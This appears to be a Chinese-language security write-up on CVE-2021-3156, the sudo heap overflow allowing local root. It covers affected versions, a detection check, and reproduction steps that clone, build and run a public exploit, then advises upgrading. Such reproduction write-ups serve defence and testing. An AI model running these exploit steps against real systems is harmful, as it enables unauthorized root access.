一、漏洞简述
Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。
2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。
当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。
安全研究人员于1月26日公开披露了此漏洞,并表示该漏洞已经隐藏了近十年。
二、受影响版本
Sudo 1.8.2 – 1.8.31p2
Sudo 1.9.0 – 1.9.5p1
三、环境概述
centos7
四、漏洞复现
1.查看sudo版本
sudo -V
2. 漏洞检测
sudoedit -s /
在普通用户登录下
#返回以“ sudoedit:”开头的错误,则可能存在安全风险。
#返回以“ usage:”开头的错误响应,则无影响
3. 漏洞复现
命令行执行以下命令
Git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich 0/1/2
注:出现#, 表示漏洞利用成功。
五、修复建议
将sudo升级到安全版本
下载链接:https://www.sudo.ws/download.html
六、参考链接
https://www.freebuf.com/vuls/270839.html https://blog.csdn.net/weixin_43867542/article/details/118890604
请登录后查看回复内容